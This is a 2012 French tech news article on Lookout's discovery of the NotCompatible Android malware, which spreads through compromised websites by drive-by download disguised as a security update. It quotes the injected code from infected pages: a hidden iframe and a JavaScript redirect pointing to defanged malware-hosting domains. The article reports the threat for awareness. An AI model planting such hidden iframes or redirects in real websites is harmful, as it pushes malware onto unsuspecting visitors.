Sécurité : un nouveau malware Android se propage par le biais de sites mobiles

03 mai 2012 à 16h31
0
00C8000005141710-photo-notcompatible.jpg
L'éditeur en sécurité mobile Lookout a mis le doigt sur un nouveau moyen utilisé par les hackers pour propager des malwares sur des terminaux Android : ces derniers utilisent une méthode proche de celle existant déjà sur les ordinateurs, qui consiste à charger un logiciel malveillant lorsqu'un site Web spécifique est visité.

« Dans ce type d'attaque, si un utilisateur visite un site Web compromis à partir d'un appareil Android, son navigateur Web va automatiquement commencer à télécharger une application. Cette méthode est communément appelée 'drive-by download' » explique Lookout sur son blog, c'est à dire que le mobinaute n'est pas invité à controler le téléchargement. « Lorsque l'application suspecte est téléchargée, l'appareil affiche une notification qui invite l'utilisateur à cliquer sur la notification pour installer l'application téléchargée. » Cette dernière est présentée comme une mise à jour de sécurité pour le terminal : elle nécessite cependant que l'autorisation d'installer des « sources inconnues » ait été accordée au préalable par l'utilisateur.

Il existe donc des freins à la propagation du malware en question, nommé NotCompatible, dont l'installation sur un terminal mobile permet de modifier les paramètres proxy de ce dernier. Néanmoins, ce qui interpelle Lookout dans cette situation, c'est principalement la méthode employée par les pirates pour diffuser le malware : selon l'éditeur, il semble que ce soit « la première fois que des sites Web compromis sont utilisés pour distribuer des logiciels malveillants ciblant les terminaux Android. »

Les sites infectés intègrent plusieurs morceaux de code dans chacune de leurs pages : l'élément suivant se trouve en bas de chaque page, et permet de déterminer la nature du terminal qui visite le site :

<iframe

style = "visibility: hidden; display: none; display: none;"

? src = "hxxp :/ / gaoanalitics.info / id = {1234567890 - 0000-DEAD-BOEUF-133713371337} "> </ iframe>

S'il s'agit d'un terminal Android, le site redirige vers le téléchargement du malware.

<html> <head> </ head> <body> <script type="text/javascript"> window.top.location.href = "hxxp :/ / androidonlinefix.info/fix1.php"; </ script> < / body> </ html>

Lookout travaille encore à l'évaluation du nombre de sites infectés par cette méthode, ainsi que sur son origine. Il y a cependant fort à parier que cette démarche risque de se démocratiser.
Modifié le 01/06/2018 à 15h36
0
0
Partager l'article :

Actualités récentes

OneWeb, le concurrent de Starlink, renaît de ses cendres
Idée cadeau pour Noël : ces Hauts-Parleurs 2.1 Logitech Z333 à prix Black Friday chez Amazon
Bon plan Fnac : deux SSD Samsung en promotion avant le Black Friday
Test iPad Air (2020) : à deux doigts de passer Pro
Bon plan télétravail : 2 souris Logitech à un prix digne du Black Friday sur Amazon
Maison connectée : Amazon Echo 4e gen + 1 ampoule Philips Hue en promo
Black Friday Week : le TOP des bons plans high-tech à saisir ce lundi soir !
Rendez votre TV intelligente avec la Mi Box S encore moins chère
La version SUV du Hummer EV a fait une apparition surprise en vidéo
Meilleur prix jamais vu pour le Magic Trackpad 2 d'Apple sur Amazon 🔥
Haut de page